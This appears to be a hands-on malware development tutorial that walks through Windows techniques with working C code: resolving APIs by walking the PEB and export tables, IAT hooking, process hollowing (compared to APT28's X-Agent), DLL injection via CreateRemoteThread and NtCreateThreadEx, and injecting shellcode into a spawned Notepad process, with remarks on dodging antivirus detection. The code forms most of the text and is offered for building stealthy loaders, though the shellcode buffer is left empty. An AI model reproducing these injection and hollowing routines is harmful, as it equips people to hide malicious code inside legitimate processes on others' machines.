Today’s article is understanding how code manipulation works in the context of malware development. We’ll cover things like loading functions dynamically, accessing the Process Environment Block (PEB), and executing functions in code.
Sure, XOR encryption is old-school, but it still works. AES? Even better. We’ll encrypt payloads, inject shellcode into live processes, hijack DLLs, We’ll dissect malware techniques, analyze low-level assembly tricks, and the tactics of APT33, APT28, and APT29
And to take it up a notch, we’ll write a simple rootkit to:
- Hook syscalls
- Hide processes
Just raw, hands-on malware development, Let’s quickly cover some basics about how Windows programs interact with the operating system.
Windows API?
The Windows API (Application Programming Interface) is a collection of functions provided by Microsoft that allow programs to interact with the Windows operating system. These functions handle everything, and for developers, the WinAPI is like a Swiss Army knife it’s essential.
When developing a program that calls a Windows API function like MessageBoxA
, you’ve got two main ways to include that function:
- Static Linking: The function is embedded directly into the program during the compilation process. This guarantees the function is always available, but it also makes the program bulkier and easier for security tools to spot.
- Dynamic Linking: Here, the function’s code is stored in a separate DLL. At runtime, the program loads the function from the DLL, keeping the program leaner and more flexible.
Now, if we take a look at the simple example below, we’re using static linking to call MessageBoxA
. While this approach works fine for basic programs, it’s not ideal for malware. Why? Because static linking is a dead giveaway to security tools. Static functions can be easily spotted that’s static why they called static.
int main(void) {
MessageBoxA(0, "Foo Here.", "Info", 0);
return 0;
}
Here, we’ve got a simple program that calls MessageBoxA
, a Windows API function that displays a dialog box with custom text and a caption. Since we’re statically here, the code is embedded directly into the program. It works fine, but as we said, this is a bit too obvious when it comes to malware.
So how can we do it dynamically?
int main(void) {
size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA("USER32.dll"), "MessageBoxA");
def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;
msgbox_a(0, "Foo Here.", "Info", 0);
return 0;
}
In this version, we’re dynamically loading MessageBoxA
from USER32.dll
at runtime using GetProcAddress
. which means that the address is only resolved only when the program runs.
We define a function pointer, def_MessageBoxA
, that matches MessageBoxA
’s signature. Then, we cast the address we get from GetProcAddress
to our function pointer and use it to call the function.
Function Hooking in DLLs
Imagine you’ve got a DLL with two exported functions: func01
and func02
. At first, both just display message boxes, get it ?
__declspec(dllexport) void func01() { MessageBoxA(0, "", "Function 1", 0); }
__declspec(dllexport) void func02() { MessageBoxA(0, "", "Function 2", 0); }
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Hook function func01
}
return TRUE;
}
The DllMain
function automatically runs when the DLL is loaded. Initially, both functions just show message boxes. But by using dynamic function loading and hooking techniques, we can intercept and modify the behavior of func01
at runtime.
Kiddy stuff here, However As we continue on this, we’ll dig deeper into techniques like PEB access, function hooking, and how they all come together to give us full control over execution.
Before, continuing I would like to highlight in which step PEB is created on process creation When Starting a program (calc.exe for example): calc.exe will call a win32 API function : CreateProcess which sends to the OS the request to create this process and start the execution.
Creating the process data structures: Windows creates the process structure EPROCESS on kernel land for the newly created calc.exe process, Initialize the virtual memory: Then, Windows creates the process, virtual memory, and its representation of the physical memory and saves it inside the EPROCESS structure, creates the PEB structure with all necessary information, and then loads the main two DLLs that Windows applications will always need, which are ntdll.dll and kernel32.dll
and finally loading the PE file and start the execution.
- PEB can be accessed from User Mode - Contains Process specific information
- EPROCESS can be only be accessed from Kernel Mode
PEB Structure
PEB is a data structure in the Windows operating system that contains information and settings related to a running process, The process control block contains data that is only useful to the kernel, such as the preferred CPU for this process. The Thread Control Block is entirely different, and is what the kernel uses to manage threads, which are what the kernel runs at the lowest level.
the PEB is accessed to retrieve information about loaded modules, specifically the base addresses of dynamically linked libraries (DLLs).
typedef struct _PEB_LDR_DATA {
ULONG Length;
UCHAR Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _UNICODE_STRING32 {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING32, *PUNICODE_STRING32;
typedef struct _PEB32 {
// ...
} PEB32, *PPEB32;
typedef struct _PEB_LDR_DATA32 {
// ...
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;
typedef struct _LDR_DATA_TABLE_ENTRY32 {
// ...
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;
As you can see, the PEB is a robust structure. The code defines several structures, such as PEB32
, PEB_LDR_DATA32
, and LDR_DATA_TABLE_ENTRY32
, which are simplified versions of the actual PEB data structures. These structures contain fields that hold information about loaded modules and their locations in memory.
size_t GetModHandle(wchar_t *libName) {
PEB32 *pPEB = (PEB32 *)__readfsdword(0x30); // ds: fs[0x30]
PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);
for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks
);
printf("current node: %ls\n", data->BaseDllName.Buffer);
if (StrStrIW(libName, data->BaseDllName.Buffer))
return data->DllBase;
}
return 0;
}
The GetModHandle
function accesses the PEB to find the base address of a loaded module. The PEB contains a data structure called PEB_LDR_DATA
that manages information about loaded modules. The InMemoryOrderModuleList
field of this structure is a linked list of loaded modules. The GetModHandle
function iterates through this list and compares module names to find the desired module based on the libName
parameter.
The PEB can be found at
- fs:[0x30] for x86 processes
- GS:[0x60] for x64 processes.
Next we call the GetFuncAddr
function which well be used to locate the address of a specific function within a loaded module. It takes the moduleBase
parameter, which is the base address of the module, and it looks into the export table of the module to find the address of the function with the specified name (szFuncName
).
size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {
// parse export table
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// parse exported function info
PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);
The export table, part of the trusty PE (Portable Executable) file format, is like a map that tells us where the external functions are hiding.
- Grabs the DOS header and NT header – these headers are like the gatekeepers, helping us navigate to the Optional Header of the PE file.
- Finds the exports – using the
IMAGE_DIRECTORY_ENTRY_EXPORT
index from the Optional Header’s data directory array, we pinpoint where the exports live. - Calculates the export table address – now that we know where the exports are, we calculate the address of the table itself. This table holds all the goodies about the module’s exported functions.
// lookup
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
if (!stricmp(sz_CurrApiName, szFuncName)) {
printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName); //enumeration process
return moduleBase + arrFuncs[ num_CurrApiOrdinal - 1 ];
}
}
return 0;
}
Calculates the function’s address by referencing the arrFuncs
array and the ordinal. The ordinal, when converted to an index, helps retrieve the correct address from the array.
Why is This Important this technique is usually how code injection is preformed and yes dynamic function loading, now Let’s take a look at main function.
int main(int argc, char** argv, char* envp) {
size_t kernelBase = GetModHandle(L"kernel32.dll");
printf("[+] GetModHandle(kernel32.dll) = %p\n", kernelBase); // result of the `GetModHandle`
size_t ptr_WinExec = (size_t)GetFuncAddr(kernelBase, "WinExec");
printf("[+] GetFuncAddr(kernel32.dll, WinExec) = %p\n", ptr_WinExec); // the address of the `WinExec`
((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);
return 0;
}
We calls the GetModHandle
function to find the base address of the “kernel32.dll” module in the current process. It uses the PEB to traverse the list of loaded modules and search for the one with the specified name (“kernel32.dll”), Next we calls the GetFuncAddr
to locate the address of the WinExec
, passes the base address of “kernel32.dll” obtained in the previous step and the function name “WinExec” as arguments and Finally, the code dynamically invokes the WinExec
function using the address obtained earlier. It casts the ptr_WinExec
to the appropriate function pointer type and calls it with the arguments “calc” (to run the Windows Calculator) and SW_SHOW
Demonstrates how to dynamically locate and execute the WinExec
function from the “kernel32.dll” module, effectively opening the Calculator This shows how code manipulation can be achieved by accessing the PEB and locating and using specific functions from loaded modules.
((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);
-
(UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec
involves typecasting theptr_WinExec
pointer into a function pointer with the appropriate signature. This typecasting is crucial to match the required parameters of theWinExec
function, which includes a string (LPCSTR) and an integer (UINT). -
("calc", SW_SHOW)
represents the arguments passed to theWinExec
function. In this piece, it instructs the system to open the Windows Calculator (“calc”) with a specified display mode (SW_SHOW
).
The code dynamically injects the execution of the WinExec
function into the context of a legitimate process. Rather than statically linking to the WinExec
function, this code locates and invokes it dynamically.
IAT Hooking
Sometimes we wanna execute functions at runtime. One way to achieve this is through “Import Address Table (IAT) Hooking.” The IAT contains the addresses of functions that a module (such as a DLL or executable) imports from other modules. IAT hooking allows us to intercept and modify function calls by manipulating the IAT. ``
Application mydll
+-------------------+ +--------------------+
| | | MessageBoxA |
| | +------------>---------------------+
| call MessageBoxA | IAT | | .... |
| | +-------------------+ |(kernel32!MsgBoxA) |
+-------------------+ | | | | .... |
+----------> jmp + | +--------------------+
| | | |
+-------------------+ +--------------------+
First the target program calls a WinAPI MessageBoxA
function, the program looks up the MessageBoxA
address in the IAT and code execution jumps to the kernel32!MessageBoxA
address resolved in step 2 where legitimate code for displaying the MessageBoxA
#define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
#define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS))
The application code makes a function call to MessageBoxA
. When the code makes a function call, it does not directly call the that function. Instead, it looks up the address of the function in the IAT, which contains entries for various imported functions. Once the address of MessageBoxA
is resolved in the IAT, the code execution jumps to that resolved address. In this piece, the resolved address points to the legitimate kernel32!MessageBoxA
function.
size_t ptr_msgboxa = 0;
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
{
auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
for (; impModuleList->Name; impModuleList++)
{
auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
for (int i = 0; arr_apiNames[i].u1.Function; i++)
{
auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
{
apiAddr = arr_callVia[i].u1.Function;
arr_callVia[i].u1.Function = callback;
break;
}
}
}
}
int main(int argc, char **argv)
{
void (*ptr)(UINT, LPCSTR, LPCSTR, UINT) = [](UINT hwnd, LPCSTR lpText, LPCSTR lpTitle, UINT uType) {
printf("[hook] MessageBoxA(%i, \"%s\", \"%s\", %i)", hwnd, lpText, lpTitle, uType);
((UINT(*)(UINT, LPCSTR, LPCSTR, UINT))ptr_msgboxa)(hwnd, "msgbox got hooked", "alert", uType);
};
iatHook((char *)GetModuleHandle(NULL), "MessageBoxA", (size_t)ptr, ptr_msgboxa);
MessageBoxA(0, "Hook Test", "title", 0);
return 0;
}
So What’s Going on Here? Instead of executing the legitimate kernel32!MessageBoxA
function, the IAT entry for MessageBoxA
is modified to point to a replacement function (the ptr
function in the code). As a result, when the application makes a call to MessageBoxA
, it actually calls the replacement function, which can alter or extend the behavior of the original function call.
Process Hollowing
So, Process hollowing is a technique that begins with the creation of a new instance of a legitimate process in a suspended state, The suspended state allows the injected code to be executed within the context of this process.
To successfully perform process hollowing, the source image (the executable being injected into the legitimate process) must meet specific requirements and characteristics to ensure that the technique works effectively. These requirements include:
- PE Format: The source image must be in the Portable Executable (PE) format, which is the standard executable file format on Windows. This format includes headers and sections that define the structure of the executable.
- Executable Code: The source image should contain executable code that can be run by the Windows operating system. This code is typically located within the
.text
section of the PE file. - Address of Entry Point: The PE header of the source image must specify the address of the entry point, which is the starting point for the execution of the code. The address of the entry point is used to set the
EAX
register in the context of the suspended process. - Sections and Data: The source image should contain necessary sections, such as the
.text
section for code and other sections for data. These sections should be properly defined in the PE header, and the data should be accessible and relevant to the code’s execution. - Relocation Table: The source image may have a relocation table that allows it to be loaded at a different base address. If the source image lacks a relocation table, it may only work if it can be loaded at its preferred base address.
Creating The Process The target process must be created in the suspended state, The code aims to create a new instance of a process in a suspended state and subsequently replace its code and data with the code and data from another executable (the source image), which includes creating a suspended process and performing memory operations to load the new image.
// Create a new instance of current process in suspended state, for the new image.
if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI))
{
// Allocate memory for the context.
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
// Retrieve the context.
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
{
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
// File Mapping
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
WriteProcessMemory
(
PI.hProcess,
LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),
SectionHeader[i].SizeOfRawData,
0
);
}
}
Alright CreateProcessA
function is used to create a new instance of the current process (or another specified executable) in a suspended state. The CREATE_SUSPENDED
flag is used to create the process in a suspended state, meaning its execution is paused, After creating the suspended process, memory is allocated using VirtualAlloc
to hold the context of the suspended process. The context structure (CTX
) is used to capture information about the process’s execution state.
Retrieving and Updating Context
GetThreadContext
function is called to retrieve the context of the suspended process’s main thread (PI.hThread
). The context is stored in theCTX
structure.- The context is updated to prepare for the execution of the new code. Specifically, the
EAX
register is set to the address of the entry point of the new code, Next the code then proceeds to copy the headers (PE header) of the source image into the allocated memory within the suspended process usingWriteProcessMemory
. This is crucial for ensuring that the new image is loaded correctly, A loop iterates through the sections of the source image (SectionHeader
) and copies the section data from the source image to corresponding memory locations within the suspended process usingWriteProcessMemory
. This step is essential to load the code and data.
At this point, the process hollowing process is set up, and the new image’s code and data have been loaded into the memory of the suspended process. The code execution will continue from this point, allowing the new image to execute within the context of the suspended process.
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
The destination address is calculated as CTX->Ebx + 8
, and 4 bytes of data are written. This memory write operation sets the location where the process should begin execution of the new code.
CTX->Eax
is updated with the address of the new code’s entry point. This sets the instruction pointer (EIP
) to the starting point of the loaded code. The entry point address is obtained from the PE header of the source image: NtHeader->OptionalHeader.AddressOfEntryPoint
. Finally, the ResumeThread
function is called to resume the execution of the suspended process. At this point, the process begins executing the injected code, starting from the entry point that was set, The injected code within the suspended process will now take control of the process’s execution.
char CurrentFilePath[MAX_PATH + 1];
GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
if (strstr(CurrentFilePath, "GoogleUpdate.exe")) {
MessageBoxA(0, "foo", "", 0);
return 0;
LONGLONG len = -1;
RunPortableExecutable("GoogleUpdate.exe", MapFileToMemory(CurrentFilePath, len));
return 0;
}
Once the application is run is used to retrieve the full path of the currently running executable (the application itself), There is a conditional check using strstr
to examine the CurrentFilePath
. If the file path contains “GoogleUpdate.exe,” it displays a message box with the title and the message “foo” using the MessageBoxA
function, If the file path doesn’t match the condition, the code continues to execute. It proceeds to call the RunPortableExecutable
function, The target process for process hollowing is specified as “GoogleUpdate.exe.” It passes the source image, Otherwise, it proceeds with the process hollowing technique to inject and run code from another executable. This is a simple example.
What we just explained is similar to what’s implemented in X-Agent (also known as Sofacy), a malware known to be associated with APT28 (Fancy Bear). APT stands for “Advanced Persistent Threat,” alright?
Now, the trick is in replacing the code of a trusted process. The malware starts by creating a new instance of the target process in a suspended state. This is done using the CreateProcess
API with the CREATE_SUSPENDED
flag.
DLL injection Techniques
DLL injection is the act of introducing code into a currently executing process. Typically, the code we introduce takes the form of a dynamic link library (DLL) since DLLs are designed to be loaded as needed during runtime. However, this doesn’t preclude us from injecting assembly code or other forms of code (such as executables or handwritten code). It’s crucial to bear in mind that you must possess the necessary level of privileges on the system to engage in memory manipulation within other programs.
The Windows API provides a range of functions that enable us to attach to and manipulate other programs, primarily for debugging purposes. We will make use of these methods to execute DLL injection. I’ve divided the DLL injection process into four distinct steps:
- Attach to the process
- Allocate Memory within the process
- Copy the DLL or the DLL Path into the processes memory and determine appropriate memory addresses
- Instruct the process to Execute your DLL
Each one of these steps can be accomplished through the use of one or more programming techniques which are summarized in the below graphic. It’s important to understand the details/options present for each technique as they all have their positives and negatives.
- LoadLibrary: Using the
LoadLibrary
function to load a DLL into a process. - CreateRemoteThread: Injecting a DLL using the
CreateRemoteThread
function. - SetWindowsHookEx: Using Windows hooks to inject code into other processes.
- Process Hollowing: Replacing the code and data of a legitimate process with a malicious DLL.
We have a couple of options (e.g. CreateRemoteThread()
,NtCreateThreadEx()
, etc…) when instructing the target process to launch our DLL. Unfortunately we can’t just provide the name of our DLL to these functions, instead we have to provide a memory address to start execution at. We perform the Allocate and Copy steps to obtain space within the target process’ memory and prepare it as an execution starting point.
There are two popular starting points: LoadLibraryA()
and jumping to DllMain
.
LoadLibraryA()
LoadLibraryA()
is a kernel32.dll
function used to load DLLs, executables, and other supporting libraries at run time. It takes a filename as its only parameter and magically makes everything work. This means that we just need to allocate some memory for the path to our DLL and set our execution starting point to the address of LoadLibraryA()
, providing the memory address where the path lies as a parameter.
The major downside to LoadLibraryA()
is that it registers the loaded DLL with the program and thus can be easily detected. Another slightly annoying caveat is that if a DLL has already been loaded once with LoadLibraryA()
, it will not execute it. You can work around this issue but it’s more code.
Jumping to DllMain
(or another entry point)
An alternative method to LoadLibraryA()
is load the entire DLL into memory, then determine the offset to the DLL’s entry point. Using this method you can avoid registering the DLL with the program (stealthy) and repeatedly inject into a process.
Attaching to the Process
First we’ll need a handle to the process so that we can interact with it. This is done with the OpenProcess() function. We’ll also need request certain access rights in order for us to perform the tasks below. The specific access rights we request vary across Windows versions, however the following should work for most:
hHandle = OpenProcess( PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE |
PROCESS_VM_READ,
FALSE,
procID );
Before we can inject anything into another process, we’ll need a place to put it. We’ll use the VirtualAllocEx()
function to do so.
VirtualAllocEx()
takes amount of memory to allocate as one of its parameters. If we use LoadLibraryA()
, we’ll allocate space for the full path of the DLL and if we jump to the DllMain
, we’ll allocate space for the DLL’s full contents.
DLL Path
Allocating space for just the DLL path slightly reduces the amount of code you’ll need to write but not by much. It also requires you to use the LoadLibraryA()
method which has some downsides (described above). That being said, it is a very popular method.
Use VirtualAllocEx()
and allocate enough memory to support a string which contains the path to the DLL:
GetFullPathName(TEXT("foo.dll"),
BUFSIZE,
dllPath, //Output to save the full DLL path
NULL);
dllPathAddr = VirtualAllocEx(hHandle,
0,
strlen(dllPath),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
Full DLL
Allocating space for the full DLL requires a little more code however it’s also much more reliable and doesn’t need to use LoadLibraryA()
.
First, open a handle to the DLL with CreateFileA()
then calculate its size with GetFileSize()
and pass it to VirtualAllocEx()
:
GetFullPathName(TEXT("foo.dll"),
BUFSIZE,
dllPath, //Output to save the full DLL path
NULL);
hFile = CreateFileA( dllPath,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL );
dllFileLength = GetFileSize( hFile,
NULL );
remoteDllAddr = VirtualAllocEx( hProcess,
NULL,
dllFileLength,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE );
Now that we have space allocated in our target process, we can copy our DLL Path or the Full DLL (depending on the method you choose) into that process. We’ll use WriteProcessMemory()to do so:
DLL Path
WriteProcessMemory(hHandle,
dllPathAddr,
dllPath,
strlen(dllPath),
NULL);
Full DLL
We’ll first need to read our DLL into memory before we copy it to the remote processes.
lpBuffer = HeapAlloc( GetProcessHeap(),
0,
dllFileLength);
ReadFile( hFile,
lpBuffer,
dllFileLength,
&dwBytesRead;,
NULL );
WriteProcessMemory( hProcess,
lpRemoteLibraryBuffer,
lpBuffer,
dllFileLength,
NULL );
Determining our Execution Starting Point
Most execution functions take a memory address to start at, so we’ll need to determine what that will be.
DLL Path and LoadLibraryA()
We’ll search our own process memory for the starting address of LoadLibraryA()
, then pass it to our execution function with the memory address of DLL Path as it’s parameter. To get LoadLibraryA()
’s address, we’ll use GetModuleHandle()
and GetProcAddress()
:
loadLibAddr = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");
Full DLL and Jump to DllMain
By copying the entire DLL into memory we can avoid registering our DLL with the process and more reliably inject. The somewhat difficult part of doing this is obtaining the entry point to our DLL when it’s loaded in memory. So we’ll use the GetReflectiveLoaderOffset()
from it to determine our offset in our processes memory then use that offset plus the base address of the memory in the victim process we wrote our DLL to as the execution starting point. It’s important to note here that the DLL we’re injecting must complied with the appropriate includes and options so that it aligns itself with the ReflectiveDLLInjection method.
dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpWriteBuff);
Executing the DLL!
At this point we have our DLL in memory and we know the memory address we’d like to start execution at. All that’s really left is to tell our process to execute it. There are a couple of ways to do this.
CreateRemoteThread()
The CreateRemoteThread()
function is probably the most widely known and used method. It’s very reliable and works most times however you may want to use another method to avoid detection or if Microsoft changes something to cause CreateRemoteThread()
to stop working.
Since CreateRemoteThread()
is a very established function, you have a greater flexibility in how you use it. For instance, you can do things like use Python to do DLL injection!
rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0, lpStartExecAddr, lpExecParam, 0, NULL);
WaitForSingleObject(rThread, INFINITE);
NtCreateThreadEx()
NtCreateThreadEx()
is an undocumented ntdll.dll
function. The trouble with undocumented functions is that they may disappear or change at any moment Microsoft decides. That being said, NtCreateThreadEx()
came in good handy when Windows session separation affected CreateRemoteThread()
DLL injection.
NtCreateThreadEx()
is a bit more complicated to call, we’ll need a specific structure to pass to it and another to receive data from it. I’ve detailed it here:
struct NtCreateThreadExBuffer {
ULONG Size;
ULONG Unknown1;
ULONG Unknown2;
PULONG Unknown3;
ULONG Unknown4;
ULONG Unknown5;
ULONG Unknown6;
PULONG Unknown7;
ULONG Unknown8;
};
typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) (
OUT PHANDLE hThread,
IN ACCESS_MASK DesiredAccess,
IN LPVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN LPTHREAD_START_ROUTINE lpStartAddress,
IN LPVOID lpParameter,
IN BOOL CreateSuspended,
IN ULONG StackZeroBits,
IN ULONG SizeOfStackCommit,
IN ULONG SizeOfStackReserve,
OUT LPVOID lpBytesBuffer
);
HANDLE bCreateRemoteThread(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
HANDLE hRemoteThread = NULL;
LPVOID ntCreateThreadExAddr = NULL;
NtCreateThreadExBuffer ntbuffer;
DWORD temp1 = 0;
DWORD temp2 = 0;
ntCreateThreadExAddr = GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateThreadEx");
if( ntCreateThreadExAddr ) {
ntbuffer.Size = sizeof(struct NtCreateThreadExBuffer);
ntbuffer.Unknown1 = 0x10003;
ntbuffer.Unknown2 = 0x8;
ntbuffer.Unknown3 = &temp2;
ntbuffer.Unknown4 = 0;
ntbuffer.Unknown5 = 0x10004;
ntbuffer.Unknown6 = 4;
ntbuffer.Unknown7 = &temp1;
ntbuffer.Unknown8 = 0;
LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;
NTSTATUS status = funNtCreateThreadEx(
&hRemoteThread;,
0x1FFFFF,
NULL,
hHandle,
(LPTHREAD_START_ROUTINE)loadLibAddr,
dllPathAddr,
FALSE,
NULL,
NULL,
NULL,
&ntbuffer;
);
if (hRemoteThread == NULL) {
printf("\t[!] NtCreateThreadEx Failed! [%d][%08x]\n", GetLastError(), status);
return NULL;
} else {
return hRemoteThread;
}
} else {
printf("\n[!] Could not find NtCreateThreadEx!\n");
}
return NULL;
}
Now we can call it very much like CreateRemoteThread()
:
rThread = bCreateRemoteThread(hTargetProcHandle, lpStartExecAddr, lpExecParam);
WaitForSingleObject(rThread, INFINITE);
So far, we’ve covered how to manipulate processes, inject DLLs, and replace legitimate code with malicious payloads. But what if we want to execute custom, low-level code directly in memory without relying on external files or DLLs? This is where shellcode comes into play.
Shellcode Execution
Shellcode is a small piece of code, that performs a specific task. It’s often used in exploits, post-exploitation activities, and malware to execute commands, spawn shells, or perform other actions directly in memory. Unlike DLLs or executables, shellcode doesn’t rely on the file system.
- Generate shellcode
- Inject shellcode
- Execute shellcode
What is Shellcode?
Shellcode is a sequence of machine instructions that perform a specific task, such as opening a reverse shell, downloading and executing a payload, or modifying system settings. It’s typically written in assembly language and compiled into raw binary format, making it lightweight and easy to inject into processes.
Shellcode is often used in conjunction with techniques like buffer overflows, process injection, or return-oriented programming (ROP) to achieve code execution in a target process.
Sounds Good, So Check This out:
int main(void){
STARTUPINFOW si = {0};
PROCESS_INFORMATION pi = {0};
if(!CreateProcessW(
L"C:\\Windows\\System32\\notepad.exe",
NULL,
NULL,
NULL,
FALSE,
BELOW_NORMAL_PRIORITY_CLASS,
NULL,
NULL,
&si,
&pi
)){
printf("(-) failed to create process, error: %ld", GetLastError());
return EXIT_FAILURE;
}
printf("(+) process started! PID:%ld", pi.dwProcessId);
return EXIT_SUCCESS;
}
What’s the purpose of this code, you may wonder? You likely have an inkling already, don’t you? Well, we’re initiating a fresh Notepad process. Let me assure you, there’s nothing shady about this code it’s entirely above board and legitimate. We’re utilizing the ‘CreateProcessW’ function, which is all about orchestrating the precise way a new process should be launched. You provide it with a set of parameters, and voilà, a new process comes to life.
BOOL CreateProcessW(
[in, optional] LPCWSTR lpApplicationName,
[in, out, optional] LPWSTR lpCommandLine,
[in, optional] LPSECURITY_ATTRIBUTES lpProcessAttributes,
[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,
[in] BOOL bInheritHandles,
[in] DWORD dwCreationFlags,
[in, optional] LPVOID lpEnvironment,
[in, optional] LPCWSTR lpCurrentDirectory,
[in] LPSTARTUPINFOW lpStartupInfo,
[out] LPPROCESS_INFORMATION lpProcessInformation
);
Now, let’s take a deeper look into our coding journey. We’re not inventing something entirely new; instead, we’re refining existing code droppers and loaders for Windows targets, making them responsive to our session commands.
Our goal here is to run unrestricted shellcode. Our toolkit includes familiar Windows API functions: ‘OpenProcess,’ ‘VirtualAllocEx,’ ‘WriteProcessMemory,’ and ‘CreateRemoteThread.’ Think of it as conducting an orchestra, where each function plays a specific role in enabling the shellcode to do its job. We’re in charge, and the Windows targets should be ready to follow our instructions.
int main()
{
STARTUPINFOW si = {0};
PROCESS_INFORMATION pi = {0};
(!CreateProcessW(
L"C:\\Windows\\System32\\notepad.exe",
NULL,
NULL,
NULL,
FALSE,
BELOW_NORMAL_PRIORITY_CLASS,
NULL,
NULL,
&si,
&pi
));
char shellcode[] ={
};
HANDLE hProcess;
HANDLE hThread;
void*exec_mem;
hProcess = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pi.dwProcessId);
exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL,0,0);
CloseHandle(hProcess);
return 0;
}
Alright, do you notice any differences? Bingo, there’s “shellcode.” Let me clarify; the initial code segment was simple, mainly focusing on creating a new process (Notepad) and adjusting its priority class. However, the code we’re dealing with now is more sinister, as it centers around remote process injection and the implementation of functions such as OpenProcess
, VirtualAllocEx
, WriteProcessMemory
, and CreateRemoteThread
to allocate memory within a target process and execute custom shellcode within it.
Nevertheless, plaintext Metasploit (msf) shellcode tends to raise red flags and is susceptible to detection by antivirus engines. In the preceding section, we delved into shellcode development, particularly emphasizing a reverse shell. Yet, this code is simpler and can be swiftly pinpointed by antivirus engines. So, let’s explore an alternative strategy how about encoding the shellcode into Read-Write-Execute (RWX) memory to initiate Notepad?
